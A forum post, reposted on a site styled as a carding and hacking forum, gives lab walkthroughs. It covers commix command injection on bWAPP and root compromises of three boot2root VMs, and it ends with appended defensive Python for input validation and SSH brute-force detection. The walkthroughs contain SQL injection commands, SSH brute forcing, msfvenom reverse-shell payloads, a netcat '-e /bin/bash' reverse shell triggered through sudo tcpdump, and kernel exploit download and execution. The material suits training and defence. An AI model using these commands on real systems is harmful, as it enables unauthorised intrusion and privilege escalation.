Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] How to bWAPP Command Injection Exploitation using Commix Bypass All Security
#1
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.
Source: [To see content please register here]

Requirements:
  • XAMPP/WAMP server
  • bWAPP lab
  • Kali Linux: Burp Suite, Commix tool
First you need to set up the bWAPP lab on your XAMPP or WAMP server; for this you can visit my previous article, “Web Pentest Lab Setup using bWAPP”: [To see content please register here]
Now I’m going to perform an OS command injection attack using bWAPP.
Start the Apache and MySQL services in the XAMPP or WAMP server. Open the localhost address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the user and password bee and bug respectively.
My task is to bypass all three security levels in bWAPP through OS command injection.
Let’s start!
Set security level: low
Look at the image below: I have set the security level to low. From the “Choose your bug” option, select OS Command Injection and click on Hack.
[Image: 1.png?w=687&ssl=1]
Type the IP in the DNS lookup field and just after that start Burp Suite in Kali Linux. Don’t forget to set the proxy in your browser while using Burp Suite.
To capture the cookie of bWAPP, click on the Proxy option, then click the “Intercept is on” button, come back to bWAPP and click on DNS.
As you can see, I have captured the cookie in Burp Suite.
[Image: 2.png?w=687&ssl=1]
Open the terminal in Kali Linux and type the commix command.
From the data fetched in Burp Suite, copy the referrer, cookie and target, and use them in the following command:
commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0" --data="target=192.168.1.103&form=submit"
This command will execute the commix tool in the terminal, which automatically performs the command injection attack using the URL and cookie information from bWAPP.
Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell.
The attack is successful; commix provided a commix os shell.
Commix (os_shell) > systeminfo
[Image: 3.png?w=687&ssl=1]
Set security level: medium
Look at the image below: now I have set the security level to medium. From the “Choose your bug” option, select OS Command Injection and click on Hack.
[Image: 4.png?w=687&ssl=1]
Repeat the process as above: type the IP in the DNS lookup field and just after that start Burp Suite.
Click “Intercept is on”, come back to bWAPP and click on DNS. As you can see, I have captured the cookie for the medium level in Burp Suite.
[Image: 5.png?w=687&ssl=1]
From the data fetched in Burp Suite, copy the referrer, cookie and target, and use them in the following command:
commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=1" --data="target=192.168.1.103&form=submit"
Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell.
The attack is successful at medium security, and again commix provided a commix os shell.
Commix (os_shell) > ipconfig
[Image: 6.png?w=687&ssl=1]
Set security level: high
After achieving an os shell at low and medium, my next mode is high security; now I’m trying to bypass this level by repeating the same process once again.
Set security to high, choose your bug, OS Command Injection, and click on Hack.
[Image: 7.png?w=687&ssl=1]
Type the IP in the DNS lookup field and just after that start Burp Suite in Kali Linux. From the data fetched in Burp Suite, copy the referrer, cookie and target, and use them in the following command.
[Image: 8.png?w=687&ssl=1]
commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=2" --data="target=192.168.1.103&form=submit"
Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell. We have successfully bypassed the high level too with the same process.
Commix (os_shell) > systeminfo
[Image: 9.png?w=687&ssl=1]

The name of the virtual machine is “Acid-Reloaded”; it was created by Avinash Thappa. This virtual machine contains both network logic and web logic. You will need to extract the RAR and run the vmx using VMplayer. The machine has DHCP active, so once it is automatically assigned an IP address, the next step will be to identify the target and discover its service(s) to start the game.
GOAL: Escalate privileges to the root user and capture the flag. Once anyone is able to beat the box, then shoot me a mail.
Penetrating Methodologies
  • Network scanning (netdiscover, nmap)
  • Port knocking (Netcat)
  • Abusing HTTP web service (Burp Suite)
  • SQL injection (Sqlmap)
  • SSH Brute-Force (Hydra)
  • Access PTY shell (ssh login)
  • Kernel privilege escalation
Let’s begin!
As always, start by finding our target:
netdiscover

[Image: 1.png?w=687&ssl=1]
This tells us that our target is 192.168.1.106. Now it is time to scan with nmap.
nmap -A 192.168.1.106

[Image: 2.png?w=687&ssl=1]
The result of nmap shows us that only port 22 is open, with the SSH service. Let’s check out port 22.
ssh 192.168.1.106

“Wann Knock me out???” sounds like a port knocking hint; therefore, let’s go for port knocking.
[Image: 3.png?w=687&ssl=1]
Following the port 22 hint (3.2.1 let’s Start the Game), we will use the netcat port knocking technique.
nc 192.168.1.106 3
nc 192.168.1.106 2
nc 192.168.1.106 1

[Image: 4.png?w=687&ssl=1]
Let’s scan with nmap again.
nmap -p- -A 192.168.1.106

Port knocking helped us to open port 33447, to which the HTTP service was redirected.
[Image: 5.png?w=687&ssl=1]
Now open the target IP in the browser using this port.
[To see content please register here]

[Image: 6.png?w=687&ssl=1]
A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It’s time to use dirb for a directory brute-force attack.
dirb [To see content please register here]

[Image: 7.png?w=687&ssl=1]
It turned up many web directories, but to me /bin/ might be interesting as it might have a shell system. No harm in checking it out in the browser, so let’s do that.
[Image: 8.png?w=687&ssl=1]
And it’s a login portal. Now let’s check its page source.
[Image: 9.png?w=687&ssl=1]
In the page source, there is a directory called includes/validation.php. I decided to check it out.
Unfortunately, I could not find anything in it, so I decided to use DirBuster to find out about directories.
[Image: 10.png?w=687&ssl=1]
In DirBuster, give the URL and, for the wordlist, use the medium 1.0 word list. Then click on the Start button and it will start finding directories. It found many PHP files, as shown below.
[Image: 11.png?w=687&ssl=1]
I checked every directory related to the bin and only /bin/dashboard.php was useful. When I opened it in the browser, I found nothing useful so I looked into the page source and even that proved to be non-useful.
[Image: 11_0.png?w=687&ssl=1]
When nothing helped, I decided to capture its cookies using BurpSuite. To capture the cookies using BurpSuite, set the proxy, turn on interception and then simply reload the page. When the cookies are captured, just add the following below the Host header:
Referer: [To see content please register here]

[Image: 11_1.png?w=687&ssl=1]
And now, as soon as you hit the Forward button, it will automatically log in.
[Image: 11_2.png?w=687&ssl=1]
On the page it says to click and when you do that it will redirect to the following page.
[Image: 12.png?w=687&ssl=1]
There was nothing on the redirected page or in its page source. So I decided to check for SQL injection and searched for a web page with id=1. Luckily, we made the right prediction and got the following result for id=1.
[Image: 13.png?w=687&ssl=1]
Using a single quote (') I checked for SQL injection and got a MySQL error message, which means the web application is vulnerable to SQL injection.
[Image: 14.png?w=687&ssl=1]
So I decided to use SQLMap.
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 --dbs --tamper=space2comment --batch

[Image: 15.png?w=687&ssl=1]
We got the database name secure_login; now let’s find out its tables.
[Image: 16.png?w=687&ssl=1]
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 -D secure_login --table --tamper=space2comment

It shows us the name of the table, i.e. UB3R/strcpy.exe
[Image: 17.png?w=687&ssl=1]
When I opened /UB3R/strcpy.exe in the browser, a dialogue box opened and asked to save a file and so I did.
[Image: 18.png?w=687&ssl=1]
Now use the file command to learn more about it; it turned out to be a PDF document, version 1.5. I then used foremost, a forensic tool that recovers files using their headers and footers.
file strcpy.exe
foremost strcpy.exe

[Image: 19.png?w=687&ssl=1]
As soon as you run the above command, a folder named output is created. Let’s check out this folder.
cd output
ls

There is a text file in the folder named audit; I decided to read it with the cat command.
cat audit.txt

[Image: 20.png?w=687&ssl=1]
There is a .rar, which I decided to unrar.
unrar x 00000213.rar

On unzipping, two files were extracted, i.e. acid.txt and lol.jpg. I decided to read acid.txt.
cat acid.txt

This .txt tells us that we are on the right path. So of course next I opened lol.jpg.
exiftool lol.jpg

But I found nothing. So I unzipped it.
unrar e lol.jpg

[Image: 21.png?w=687&ssl=1]
Unzipping lol.jpg gave me two files again: one was “hint.txt” and the other “Avinash.contact”. So I opened hint.txt, which told me to go with Avinash.contact, so I opened that next.
cat hint.txt
cat Avinash.contact

[Image: 22.png?w=687&ssl=1]
There was a base64 code given in the file, so we decoded it with the help of echo as shown, and it turned out to be NooB@123.
Syntax: echo Base64 text | base64 -d
[Image: 23.png?w=687&ssl=1]
And then I applied brute force on SSH using the text file that I had just created with random words. With the help of the following command, we tried to crack the password for SSH and successfully obtained two credentials for SSH login.
hydra -L user.txt -p NooB@123 -u 192.168.1.106 ssh

[Image: 24.png?w=687&ssl=1]
And it gave us makke:NooB@123 as username and password respectively. And so I logged in with SSH.
ssh [email protected]

Give the password when asked. When I logged in, I checked the kernel’s version and tried to download its exploit, but it didn’t happen. All the options for downloading were blocked, so I started exploring.
So I went directly to /bin.
cd /bin
ls


[Image: 25.png?w=687&ssl=1]
In /bin, there was a file called overlayfs. This is a famous exploit, so I executed it.
./overlayfs
id
ls -la

And then, fortunately, there was a flag.txt.
cat flag.txt


[Image: 26.png?w=687&ssl=1]

Breach 2.1 is the second VM in the multi-series Boot2Root CTF challenges. It was developed by mrb3n. It is a high-level challenge and shows a lot of scenarios, including plenty of twists and trolls along the way. It works on a static IP, i.e. 192.168.110.151; therefore, we have configured our adapter to be a host-only adapter.
You can download it from [To see content please register here]

WalkThrough
As our VM is hosted on a static IP, there is no need to discover our target; we will start directly by scanning it.
nmap -p- -A 192.168.110.151
[Image: 1.png?w=687&ssl=1]
Nmap shows us that only three ports are open: 111, 52263 and 65535, with the services rpcbind, status and SSH respectively. Let’s check the SSH port.
ssh 192.168.110.151 -p 65535
Here,
-p = a specified port
[Image: 3.png?w=687&ssl=1]
Let’s assume here that the password is “inthesource”, because in the area between the hashes it says “Peter, if that’s you – the password is in the source”. That means peter is the username and the password is inthesource. I gave it a try.
ssh [The contents of this section are hidden for your group] -p 65535
It logged in but I couldn’t find anything. So I just gave nmap another try, and there was port 80 open this time.
nmap -p- -A 192.168.110.151
[Image: 4.png?w=687&ssl=1]
As port 80 just opened, to our luck we can now open this in our browser.
[Image: 5.png?w=687&ssl=1]
Now on the webpage, it says “Welcome to Initech Cyber consulting. LLC” and something about BEEF. Even in the page source, I found nothing so I decided to use DirBuster. It showed me a lot of directories but the one that stole my interest was /blog/.
[Image: 6.png?w=687&ssl=1]
So I opened it in the browser. It opened a travel blog. There was a search box on the blog so I tried SQL injection by using the single inverted comma (‘).
[Image: 7.png?w=687&ssl=1]
This way I found an SQL vulnerability, so I used SQLMap next.
sqlmap -u [To see content please register here] --dbs
[Image: 9.png?w=687&ssl=1]
This command will start the process and it will show you five table names in the database.
[Image: 10.png?w=687&ssl=1]
Of these five, oscommerce is the most famous CMS for e-commerce websites, and this blog was also related to commerce. So I decided to use my next SQLMap command against this table in the database.
sqlmap -u [To see content please register here]= --dbs -D oscommerce --tables --dump
[Image: 11.png?w=687&ssl=1]
Execution of this command will give you the username and password. The username is admin, but the password that you receive will be an MD5 hash value.
[Image: 12.png?w=687&ssl=1]
You can crack this MD5 hash value using any third-party tool, or you can use an online method as I did.
[Image: 13.png?w=687&ssl=1]
Upon cracking, the password you get here is 32admin. Now I have a username and password but I do not have a login portal. So I started exploring the blog but couldn’t find anything. So I copied its copyright information and pasted it into Google.
[Image: 14.png?w=687&ssl=1]
And upon searching Google, the first link I found was to exploit-db.com, which means there is an exploit for it. That’s why I opened the link and explored it.
[Image: 15.png?w=687&ssl=1]
In the exploit there was information about XSS code, and a link was provided. Now I know that BEEF does XSS work, and on the very first webpage too there was something about BEEF. So naturally, I started working with BEEF.
[Image: 16.png?w=687&ssl=1]
Now BEEF automatically gives us a script which includes a link. I copied that link and opened the BEEF panel in the browser.
[Image: 17.png?w=687&ssl=1]
Here, go to the register option, paste the copied link in the username area, and give any random password and email.
[Image: 18.png?w=687&ssl=1]
As you can see BEEF will give you a session.
[Image: 19.png?w=687&ssl=1]
From all the cross-site scripting details BEEF has to show, please pay close attention to the browser. You will find that our target is using Firefox 15.0, and fortunately there is an exploit for this in Metasploit.
[Image: 20.png?w=687&ssl=1]
Now open Metasploit and type the following commands to use the said exploit:
use exploit/multi/browser/firefox_proto_crmfrequest
set payload generic/shell_reverse_tcp
set srvhost 192.168.110.128
set uripath shell
set lhost 192.168.110.128
exploit
[Image: 21.png?w=687&ssl=1]
Performing this exploit will give you a URL; in my case the URL is [To see content please register here]:8080/shell. Copy this link and go to the BEEF panel. In the BEEF panel go to the Commands tab > Hooked Domain > Redirect Browser. Paste the copied link here in the Redirect URL text box.
[Image: 22.png?w=687&ssl=1]
As you follow the above steps you will have a shell session.
[Image: 23.png?w=687&ssl=1]
Now here is a trick: you will lose the session as soon as you get it. Here you will have to transfer your shell session to a meterpreter session within 5 seconds, and for that type:
use post/multi/manage/shell_to_meterpreter
set session 1
run
[Image: 24.png?w=687&ssl=1]
And you will have a session. Open that session and you will reach the terminal. In the terminal, let’s check out the home folder.
cd /home
ls
In the home folder, you will find three folders, i.e. bill, milton, peter. It was not of much use, so I went ahead and checked the network status.
netstat -tln
[Image: 25.png?w=687&ssl=1]
Checking the network status gave me some coordinates. So I checked them on Google map and found that it was the coordinates of Houston. Now, this Houston word can be a password or username so I just made a mental note of it for later use.
[Image: 26.png?w=687&ssl=1]
Except for this I found nothing, so I decided to use Telnet in order to get a reply, and for that used the following command:
telnet 127.0.0.1 2323
[Image: 27.png?w=687&ssl=1]
This time it replied with a question, i.e. whose stapler is it? Now I don’t know the answer, so I just pressed enter. To find the answer I wanted to search for the milton user, and for this the commands are:
find /usr -user milton
cat /usr/local/bin/cd.py
[Image: 28.png?w=687&ssl=1]
Now the Python file showed me the code and, as you can see in the image, the code shows that the correct answer is “mine”.
So I repeated my steps to reach the same question, and gave the answer as mine.
[Image: 29.png?w=687&ssl=1]
Then I checked the status of network and observed that port 8888 opened.
[Image: 30.1.png?w=687&ssl=1]
I checked this port in the browser and found two directories.
[Image: 30.png?w=687&ssl=1]
Out of these, I opened oscommerce link and the following page opened.
[Image: 31.png?w=687&ssl=1]
I had the username and password for this CMS, so I Googled its admin page and logged in with admin as the username and admin as the password.
Note: we cracked the MD5 value of the password, which resulted in 32admin, but here there is no use for 32. The password is admin.
[Image: 32.png?w=687&ssl=1]
It logged in, but to upload the malicious code you have to follow the path: file manage > includes > work. Here you have to upload your PHP code.
[Image: 33.png?w=687&ssl=1]
To generate the code, go to the terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.110.128 lport=8443 -f raw
[Image: 34.png?w=687&ssl=1]
Copy everything from <? to die(); and save it in a .php document.
[Image: 35.png?w=687&ssl=1]
Before running the file, go to Metasploit and start multi/handler.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 8443
exploit
It will give you the meterpreter session; then type the following combination of commands to reach a terminal:
shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
id
Next type:
/var/www/html2/oscommerce/includes/work
[Image: 36.png?w=687&ssl=1]
Still, we haven’t reached root, but we found blumbergh; let’s see what privileges it has.
sudo -l
OK. So it says that it can run tcpdump as root. That’s interesting. To manipulate tcpdump I need to run the following set of commands:
echo $'id\n/bin/netcat 192.168.110.128 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
[Image: 37.png?w=687&ssl=1]
The tough part is over! Now I just need to run netcat:
nc -nlvp 443
Let’s confirm whether we have reached root or not and, if yes, let’s see what it has to offer:
id
cd /root
ls
[Image: 39.png?w=687&ssl=1]
There is a flag.py file in /root. So no waiting. Let’s capture the flag.
python .flag.py
[Image: 40.png?w=687&ssl=1]
HURRAYYYY!!!! The flag has been captured!!! Enjoy!

This is another Boot2Root challenge which has been prepared by KoocSec for hacking exercises. He prepared this through the inspiration of his OSCP exam. It is based on the concepts of the great novel-turned-movie The Lord of the Rings.
You can download this VM from: [To see content please register here]

Breaching Methodology
  • Network Scanning (Nmap)
  • Port knocking
  • Use robots.txt
  • Login Form Based SQL Injection (Sqlmap)
  • SSH brute force (Metasploit)
  • Get into the shell for privilege escalation
  • Import python one-liner for proper TTY shell
  • Kernel Privilege Escalation
  • Get Root access and capture the flag.
Firstly, we will find our target.
netdiscover

[Image: 1.png?w=687&ssl=1]
Our target is 192.168.1.101.
Now run an nmap scan to find the ports and protocols.
nmap -p- -A 192.168.1.101

[Image: 2.png?w=687&ssl=1]
Nmap shows us that only port 22 is open, with the SSH service. Port 80 is not open, which means we cannot open this server in the browser. Therefore we will try to see what port 22 has to offer, so go to your terminal in Kali and type:
ssh 192.168.1.101 22

[Image: 3.png?w=687&ssl=1]
When I tried SSH it said “Knock Friend To Enter” and “Easy as 123”, and then it asked for a password that we do not know yet. Now, this is hinting towards port knocking. Let’s try it:
nmap -r -Pn -p 1,2,3 192.168.1.101

Now fire up the nmap scan again. This time hopefully we will have more than one port in the result.
nmap -p- -A 192.168.1.101

[Image: 4.png?w=687&ssl=1]
As you can see, there is one more port open in comparison to our previous scan, i.e. 1337, which has the HTTP service, and this is all we wanted, as by default port 80 was not open. Let’s open our target IP with this port.
192.168.1.101:1337

[Image: 5.png?w=687&ssl=1]
It opens a page with only one image, as shown above; we also checked its source code but didn’t get any clue. Generally, there is always some chance of finding a robots.txt file inside a web directory; therefore, while testing any system we should always check for the robots.txt file.
Here we tested for robots.txt at the URL 192.168.1.101:1337/robots.txt, and a new web page with the following image opened.
[Image: 6.png?w=687&ssl=1]
After that we looked into its source code and found a base64-encoded value.
[Image: 7.png?w=687&ssl=1]
Further, we decoded it twice in Kali as shown below and found a directory inside it. Let’s open it.
[Image: 8.png?w=687&ssl=1]
And now we are face to face with a login portal. Now here I will try to log in with help of SQL injection and for that, we can use sqlmap.
[Image: 9.png?w=687&ssl=1]
Since we don’t know the exact username and password, we used SQLMAP for login-form-based injection to retrieve the database name and login credentials by executing the following command.
sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch

[Image: 10.png?w=687&ssl=1]
And it will start gathering the database.
[Image: 11.png?w=687&ssl=1]
And finally, it will show you the database of usernames and passwords.
[Image: 12.png?w=687&ssl=1]
Moving on, save all of these usernames and passwords in two different text files, and use these text files in an SSH login attack with the help of the brute-force method. To execute this attack, go to the terminal in Kali, open Metasploit by typing msfconsole and then type:
use auxiliary/scanner/ssh/ssh_login
msf exploit (scanner/ssh/ssh_login)> set rhosts 192.168.1.101
msf exploit (scanner/ssh/ssh_login)> set user_file /root/Desktop/user.txt
msf exploit (scanner/ssh/ssh_login)> set pass_file /root/Desktop/pass.txt
msf exploit (scanner/ssh/ssh_login)> set stop_on_success true
msf exploit (scanner/ssh/ssh_login)> exploit

And as a result, it will show you the correct username and password, i.e. smeagol:MyPreciousR00t. Moreover, Metasploit gives you an additional benefit by providing a remote system command shell as unauthorized access into the victim’s system. Now start working towards root privileges. To get a proper TTY shell, we imported a Python one-line script by typing the following:
python -c 'import pty;pty.spawn("/bin/bash")'

Now you will reach the terminal. Here, type the following command to know the version of the kernel:
lsb_release -a

[Image: 13.png?w=687&ssl=1]
The version is 14.04 and luckily we have an exploit for this version. In the Kali terminal, let’s search for the appropriate exploit, and for this type:
searchsploit ubuntu 14.04

[Image: 15.png?w=687&ssl=1]
Copy the exploit to the desktop with the help of the cp command and run a Python HTTP server to transfer it to the target machine.
[Image: 16.png?w=687&ssl=1]
First, we need to download the exploit and compile it, and for this type:
wget [To see content please register here]
gcc 39166.c -o shell

The first of the above commands will download the exploit and the second one will compile it and save it in a file named shell. Next, we have to give permissions to shell and then, at last, we have to run it.
chmod 777 shell
./shell

Now let’s get into the root folder and see what it has to offer:
cd /root
ls

Here, we found a text file with the name flag, which was our ultimate goal. So no more waiting; let’s read it.
cat Flag.txt

[Image: 17.png?w=687&ssl=1]
Reply
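
The condition described at the top of the post (user-supplied data passed to a system shell) seen from the defender's side, as an added example that is not part of the original post and is not bWAPP code: a lookup handler that validates the `target` field and builds an argument vector instead of a shell string. The function names and sample input are constructed, and a Python one-liner stands in for nslookup so the block runs offline.

```python
"""Added example (not bWAPP code): keeping a DNS-lookup field out of the shell.

Function names and the sample input are constructed for illustration.
A Python one-liner stands in for nslookup so the demonstration runs offline.
"""
import ipaddress
import re
import shlex
import subprocess
import sys

# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Stand-in for the lookup tool: prints the single argument it was given.
_STAND_IN = "import sys; print('lookup:', sys.argv[1])"

# Constructed input: a valid address followed by a shell control operator.
SAMPLE_INPUT = "192.168.1.103; echo INJECTED"


def validate_target(target):
    """Return a canonical IP address or hostname, or raise ValueError."""
    if not isinstance(target, str) or not target or len(target) > 253:
        raise ValueError("target missing or too long")
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    host = target[:-1] if target.endswith(".") else target
    if all(_LABEL.fullmatch(label) for label in host.split(".")):
        return host.lower()
    raise ValueError("target is not an IP address or hostname")


def run_via_shell(target):
    """Vulnerable pattern: the field is concatenated into a shell command line."""
    cmd = f"{shlex.quote(sys.executable)} -c {shlex.quote(_STAND_IN)} {target}"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=10)
    return done.stdout.splitlines()


def run_via_argv(target, validate=True):
    """Hardened pattern: no shell, one argv element, allow-list validation first.

    validate=False exists only to show that metacharacters are inert in an
    argument vector. Validation is still needed: it also rejects values that
    start with '-', which the tool would otherwise read as an option.
    """
    arg = validate_target(target) if validate else target
    argv = [sys.executable, "-c", _STAND_IN, arg]
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return done.stdout.splitlines()


if __name__ == "__main__":
    print("shell string :", run_via_shell(SAMPLE_INPUT))
    print("argv, no check:", run_via_argv(SAMPLE_INPUT, validate=False))
    try:
        run_via_argv(SAMPLE_INPUT)
    except ValueError as exc:
        print("argv + check  : rejected:", exc)
    print("argv + check  :", run_via_argv("192.168.1.103"))
```
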
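
The SSH guessing steps in the second and third walkthroughs (hydra with one password against a user list, and Metasploit's ssh_login) leave a recognisable pattern in sshd logs: one source failing against many different account names, then an accepted login. This added detection example is not part of the original post; the log lines, hostname and source addresses are constructed, and only the account name makke comes from the walkthrough.

```python
"""Added example: flag many-usernames-from-one-source SSH guessing in sshd logs.

Not from the original post. Log lines, hostname and source addresses are
constructed; only the account name "makke" comes from the walkthrough.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the usual OpenSSH syslog format.
SAMPLE_LOG = """\
Mar  4 10:15:01 acid sshd[2101]: Failed password for invalid user admin from 192.168.1.108 port 40112 ssh2
Mar  4 10:15:02 acid sshd[2103]: Failed password for root from 192.168.1.108 port 40114 ssh2
Mar  4 10:15:03 acid sshd[2105]: Failed password for invalid user acid from 192.168.1.108 port 40116 ssh2
Mar  4 10:15:04 acid sshd[2107]: Failed password for invalid user test from 192.168.1.108 port 40118 ssh2
Mar  4 10:15:05 acid sshd[2109]: Failed password for invalid user avinash from 192.168.1.108 port 40120 ssh2
Mar  4 10:15:06 acid sshd[2111]: Failed password for invalid user saman from 192.168.1.108 port 40122 ssh2
Mar  4 10:15:07 acid sshd[2113]: Accepted password for makke from 192.168.1.108 port 40124 ssh2
Mar  4 10:20:11 acid sshd[2150]: Failed password for alice from 192.168.1.50 port 51002 ssh2
Mar  4 10:20:19 acid sshd[2152]: Accepted password for alice from 192.168.1.50 port 51004 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_events(text, year=2024):
    """Return sorted (timestamp, result, user, source) tuples from sshd lines.

    Syslog timestamps carry no year, so the caller supplies one.
    """
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # other sshd/PAM messages are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return sorted(events)


def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Flag sources that fail against >= min_users distinct accounts in a window."""
    fails, accepts = defaultdict(list), defaultdict(list)
    for ts, result, user, src in events:
        (fails if result == "Failed" else accepts)[src].append((ts, user))

    findings = []
    for src, attempts in fails.items():
        recent = deque()  # failures inside the sliding window
        for ts, user in attempts:
            recent.append((ts, user))
            while ts - recent[0][0] > window:
                recent.popleft()
            if len({u for _, u in recent}) >= min_users:
                start = recent[0][0]
                findings.append({
                    "src": src,
                    "first_seen": start,
                    "users_tried": sorted(
                        {u for t, u in attempts if start <= t <= start + window}
                    ),
                    # A success from the same source after guessing began is
                    # the line to escalate: that account's password is known.
                    "accepted_logins": sorted(
                        {u for t, u in accepts[src] if t >= start}
                    ),
                })
                break  # one finding per source
    return findings


if __name__ == "__main__":
    for finding in detect_spray(parse_events(SAMPLE_LOG)):
        print(finding)
```
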






